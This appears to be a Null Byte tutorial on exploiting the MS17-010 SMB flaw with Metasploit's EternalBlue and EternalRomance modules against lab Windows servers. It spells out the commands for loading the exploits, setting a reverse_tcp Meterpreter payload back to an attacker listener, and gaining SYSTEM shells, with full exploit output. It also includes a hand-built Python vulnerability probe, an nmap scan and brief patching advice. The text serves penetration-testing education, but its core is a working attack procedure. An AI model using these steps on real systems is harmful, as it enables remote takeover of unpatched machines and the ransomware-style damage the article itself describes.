
How to Use EternalBlue on Windows Server with Metasploit « Null Byte :: WonderHowTo



Certain vulnerabilities and exploits make headlines with their catchy names and impressive potential for damage. EternalBlue is one of these exploits. Originally attributed to the NSA, this zero-day exploited a flaw in the SMB protocol that affected many Windows machines and caused havoc everywhere. Here we will use EternalBlue to exploit SMB via Metasploit.

What is EternalBlue?

EternalBlue is an exploit that was most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the NSA's Tailored Access Operations unit.

EternalBlue, commonly referred to by its Microsoft bulletin number MS17-010, exploits a vulnerability in Microsoft's Server Message Block (SMB) protocol, specifically in the legacy SMBv1 implementation. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability exists because earlier versions of SMB contain a bug that lets an attacker establish a null session connection via anonymous login. The attacker can then send malformed packets and ultimately execute arbitrary code on the target as SYSTEM, without ever authenticating.

EternalBlue was primarily responsible for the WannaCry and NotPetya ransomware outbreaks and the EternalRocks worm; the related Bad Rabbit ransomware spread using its sibling exploit, EternalRomance.

Option 1: Use EternalBlue with Metasploit

We will use an unpatched copy of Windows Server 2008 R2 as the target for the first part of this tutorial. An evaluation copy can be downloaded from Microsoft if you want to follow along.

Step 1: Find a module to use

The first thing we need to do is open a terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it isn't already running, followed by msfconsole.

  service postgresql start
msfconsole 

Then use the search command within Metasploit to find a suitable module to use.

  search eternalblue

  Matching Modules
  ================

     Name                                           Disclosure Date  Rank     Check  Description
     ----                                           ---------------  ----     -----  -----------
     auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
     auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
     exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
     exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There is an auxiliary scanner (auxiliary/scanner/smb/smb_ms17_010) that we can run to determine whether a target is vulnerable to MS17-010. It is always a good idea to do recon like this first. The scanner only sends a harmless SMB transaction and reads the error code the server returns, whereas the exploit itself corrupts the kernel pool and can crash the target, so you want to know the host is actually vulnerable before firing it. Otherwise you can waste a lot of time (or a production server) on a target that isn't even vulnerable.

Once we have determined that our target is indeed vulnerable to EternalBlue, we can load the exploit module with the use command.

  use exploit/windows/smb/ms17_010_eternalblue

You'll know you're good if the prompt changes to exploit(windows/smb/ms17_010_eternalblue).

Step 2: Run the module

Let's take a look at our options:

  options
  Module options (exploit/windows/smb/ms17_010_eternalblue):

     Name           Current Setting  Required  Description
     ----           ---------------  --------  -----------
     RHOSTS                          yes       The target address range or CIDR identifier
     RPORT          445              yes       The target port (TCP)
     SMBDomain      .                no        (Optional) The Windows domain to use for authentication
     SMBPass                         no        (Optional) The password for the specified username
     SMBUser                         no        (Optional) The username to authenticate as
     VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
     VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

  Exploit target:

     Id  Name
     --  ----
     0   Windows 7 and Server 2008 R2 (x64) All Service Packs

First, we need to set the target's IP address.

  set rhosts 10.10.0.101 
  rhosts => 10.10.0.101 

Next, we can load the trusty reverse_tcp Meterpreter as the payload. Note that the module only has a 64-bit target, so the payload must be x64 as well.

  set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp

Finally, set the listening host to the IP address of our attacking machine.

  set lhost 10.10.0.1 
  lhost => 10.10.0.1 

And the listening port to a suitable number.

  set lport 4321 
  lport => 4321 

That should be all, so the only thing that remains is to launch the exploit. Use the run command to fire it off.

  run
  [*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.0.101:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

We can see a number of things happening here: the SMB connection is established, the non-paged kernel pool is groomed, and the exploit packet is sent. Finally we see a "WIN" and a Meterpreter session opens. Sometimes this exploit will not complete successfully the first time, because the pool grooming relies on the heap layout ending up the way the module expects. If it doesn't work, just try again and it should go through.

Step 3: Verify the target is compromised

We can verify that we have compromised the target by running commands like sysinfo to obtain operating system information.

  sysinfo
  Computer        : SO2
  OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : DLAB
  Logged On Users : 2
  Meterpreter     : x64/windows

and getuid to get the current user.

  getuid
  Server username: NT AUTHORITY\SYSTEM

This exploit doesn't work well on newer systems, and because it corrupts the kernel's non-paged pool, a failed attempt can blue-screen the target machine. Keep that in mind before running it against anything that isn't a lab box.

Option 2: EternalRomance/EternalSynergy/EternalChampion

As if EternalBlue wasn't devastating enough, three more similar exploits were developed after it. EternalRomance and EternalSynergy exploit a type confusion between SMB transaction types (CVE-2017-0143), while EternalChampion and EternalSynergy exploit a race condition in transaction handling (CVE-2017-0146).

These were combined into a single Metasploit module that also uses the classic psexec technique to run the payload. It is considered more reliable than EternalBlue, less likely to crash the target, and works on all recent unpatched versions of Windows, up to Server 2016 and Windows 10.

The only catch is that this exploit requires a named pipe that can be opened over the anonymous (null) session. Named pipes provide a way for running processes to communicate with one another, and they appear as files under \\host\IPC$ that other processes can attach to. The Metasploit module automatically tries a wordlist of common pipe names, making it quite easy to use as long as at least one accessible named pipe is present on the target.

Step 1: Finding a Vulnerable Target

We can use Nmap as an alternative to the Metasploit scanner to discover whether a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that allows all kinds of scripts to be run against a target.

Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our target will be an unpatched copy of Windows Server 2016 Datacenter. Evaluation copies can be downloaded from Microsoft if you want to follow along.

We can specify a single script to run with the --script option, along with the -v flag for verbosity and our target's IP address. First, exit back to a shell if you are still running Metasploit.

  nmap --script smb-vuln-ms17-010 -v 10.10.0.100

Nmap will start, and it shouldn't take too long since we're only running one script. At the end of the output we find the results.

  Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05

...

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
           Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)

We can see it lists the target as vulnerable, along with additional information such as the risk factor and links to the CVE and Microsoft's advisory.
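Both the Metasploit auxiliary scanner mentioned earlier and the Nmap script above decide "vulnerable" the same way: they open a null session to IPC$ over SMBv1 and send a TRANS_PEEK_NMPIPE transaction on a bogus file ID. An unpatched server leaks the bug through its error code (STATUS_INSUFF_SERVER_RESOURCES), while a patched one answers STATUS_INVALID_HANDLE, or STATUS_ACCESS_DENIED if null sessions are refused. The script below is an added example written for this article, not Null Byte's, Metasploit's or Nmap's code; it builds those four SMB messages by hand so the exchange is visible, and it assumes the lab address 10.10.0.100 from this tutorial.

```python
"""MS17-010 check at the SMB level (added example, not the tutorial's code).

Exchange: NEGOTIATE -> SESSION_SETUP_ANDX (anonymous) -> TREE_CONNECT_ANDX
to IPC$ -> SMB_COM_TRANSACTION / TRANS_PEEK_NMPIPE on FID 0. Only the NT
status of the last reply is interpreted; nothing is corrupted on the host.
"""
import socket
import struct

SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS_PEEK_NMPIPE = 0x0023

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_HANDLE = 0xC0000008           # patched host
STATUS_ACCESS_DENIED = 0xC0000022            # patched, or null session refused
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched, MS17-010 missing

HEADER = "<4sBIBHHQHHHHH"  # 32-byte SMBv1 header, little-endian


def smb_header(command, status=0, tid=0, uid=0):
    """Flags2=0x4001 asks for NT status codes and long names, with no Unicode
    and no extended security, so the plain session-setup layout below applies."""
    return struct.pack(HEADER, b"\xffSMB", command, status, 0x18, 0x4001,
                       0, 0, 0, tid, 0xFEFF, uid, 0)


def netbios(message):
    """NetBIOS session service framing: type byte 0x00 plus a 3-byte length."""
    return struct.pack(">I", len(message)) + message


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup_request():
    """Anonymous SESSION_SETUP_ANDX: empty user and domain, a 1-byte NUL
    password, capabilities 0x50 (NT SMBs + NT status). This is a null session."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 1, 0, 1, 0, 0, 0x50)
    data = b"\x00" + b"\x00" + b"\x00" + b"Unix\x00" + b"Samba\x00"
    return smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words + struct.pack("<H", len(data)) + data


def tree_connect_request(uid, host):
    """TREE_CONNECT_ANDX to \\\\host\\IPC$ using the UID the server handed back."""
    data = b"\x00" + ("\\\\%s\\IPC$" % host).encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data


def peek_nmpipe_request(tid, uid):
    """SMB_COM_TRANSACTION carrying TRANS_PEEK_NMPIPE with FID 0. The FID is
    deliberately bogus; only the error code the server chooses matters."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)  # no parameters or data follow the name
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, offset, 0, offset, 2, 0)
    setup = struct.pack("<HH", TRANS_PEEK_NMPIPE, 0)
    return (smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + b"\x10" + words
            + setup + struct.pack("<H", len(name)) + name)


def parse_smb_response(raw):
    """Return (command, nt_status, tid, uid) from a NetBIOS-framed SMBv1 reply."""
    if len(raw) < 36 or raw[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 message")
    fields = struct.unpack(HEADER, raw[4:36])
    return fields[1], fields[2], fields[8], fields[10]


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN"


def check_host(host, port=445, timeout=5.0):
    """Run the exchange against a live host; returns (verdict, last NT status)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        def exchange(request):
            sock.sendall(netbios(request))
            head = sock.recv(4)
            if len(head) < 4:
                raise ConnectionError("server closed the connection (SMBv1 disabled?)")
            length, body = struct.unpack(">I", head)[0] & 0xFFFFFF, b""
            while len(body) < length:
                chunk = sock.recv(length - len(body))
                if not chunk:
                    raise ConnectionError("connection closed mid-reply")
                body += chunk
            return parse_smb_response(head + body)

        _, status, _, _ = exchange(negotiate_request())
        if status != STATUS_SUCCESS:
            raise RuntimeError("SMBv1 negotiate failed: 0x%08X" % status)
        _, status, _, uid = exchange(session_setup_request())
        if status != STATUS_SUCCESS:
            return "UNKNOWN", status  # null sessions refused; cannot probe
        _, status, tid, _ = exchange(tree_connect_request(uid, host))
        if status != STATUS_SUCCESS:
            return "UNKNOWN", status
        _, status, _, _ = exchange(peek_nmpipe_request(tid, uid))
        return classify(status), status


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.0.100"  # assumed lab host
    verdict, code = check_host(target)
    print("%s: %s (NT status 0x%08X)" % (target, verdict, code))
```

Run it as python3 ms17_check.py 10.10.0.100. A "PATCHED" verdict with STATUS_ACCESS_DENIED, or a closed connection right after NEGOTIATE, is also what you see when SMBv1 has been disabled, which is the fix you want on the defending side anyway. Unlike the exploit module, this probe never touches the kernel pool, so it is safe to point at production hosts during an assessment.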

Step 2: Find a module to use

Now that we know the target is vulnerable, we can go back to Metasploit and search for an appropriate exploit.

  msfconsole
  search eternalromance
  Matching Modules
  ================

     Name                                  Disclosure Date  Rank    Check  Description
     ----                                  ---------------  ----    -----  -----------
     auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
     exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

And load the module in Metasploit with the use command.

  use exploit/windows/smb/ms17_010_psexec

You'll know you're good if the prompt changes to exploit(windows/smb/ms17_010_psexec).

Step 3: Run the module

Let's take a look at our options:

  options
  Module options (exploit/windows/smb/ms17_010_psexec):

     Name                  Current Setting                                                 Required  Description
     ----                  ---------------                                                 --------  -----------
     DBGTRACE              false                                                           yes       Show extra debug trace info
     LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
     NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
     NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
     RHOSTS                                                                                yes       The target address range or CIDR identifier
     RPORT                 445                                                             yes       The target port
     SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
     SERVICE_DISPLAY_NAME                                                                  no        The service display name
     SERVICE_NAME                                                                          no        The service name
     SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
     SMBDomain             .                                                               no        The Windows domain to use for authentication
     SMBPass                                                                               no        The password for the specified username
     SMBUser                                                                               no        The username to authenticate as

  Exploit target:

     Id  Name
     --  ----
     0   Automatic

As expected, the module works through a wordlist of named pipes and connects to the first one it can open. We can leave all of this at the defaults for now, but we do have to set the remote host.

  set rhosts 10.10.0.100 
  rhosts => 10.10.0.100 

And the payload for the reverse shell, the same x64 Meterpreter as before.

  set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp

And the local port for the listener (set lhost to your attacking machine's address again if it isn't already populated).

  set lport 4321
  lport => 4321

We should be good to go now. Type run to start the exploit.

  run
  [*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500

We can see the module build a write-what-where primitive, obtain a SYSTEM session and execute the payload through a service, and we end up with a Meterpreter session.

Step 4: Verify the target is compromised

Again, we can verify that we have compromised the system with commands like sysinfo.

  sysinfo
  Computer        : DC01
  OS              : Windows 2016 (Build 14393).
  Architecture    : x64
  System Language : en_US
  Domain          : DLAB
  Logged On Users : 4
  Meterpreter     : x64/windows

and getuid.

  getuid
  Server username: NT AUTHORITY\SYSTEM

Prevention and Current Status

Despite all the damage EternalBlue has caused, there is a reliable way to prevent these types of exploits: patch your systems! At this point, almost two years after these vulnerabilities were disclosed, there is really no excuse for running unpatched operating systems. Where a patch truly cannot be applied, disabling SMBv1 entirely and blocking TCP port 445 from untrusted networks removes the attack surface these exploits depend on.

However, EternalBlue continues to be a problem. Although the consequences are ugly, some organizations will unfortunately still run unpatched systems. That, combined with pirated versions of Windows that never receive updates, makes EternalBlue a significant threat to this day.

Cryptojacking, which secretly uses a victim's computer to mine cryptocurrency, is another threat that uses EternalBlue to spread. WannaMine was one such outbreak that hijacked computers around the world in 2018.

Wrapping Up

Today we learned about EternalBlue and how to use it with Metasploit. We also learned about a similar exploit which is more reliable and works on more systems. In the next tutorial, we will dig a little deeper and learn how to exploit EternalBlue manually, which is much more satisfying in the end.

Cover image by Fancycrave/Pexels; screenshots by drd_/Null Byte
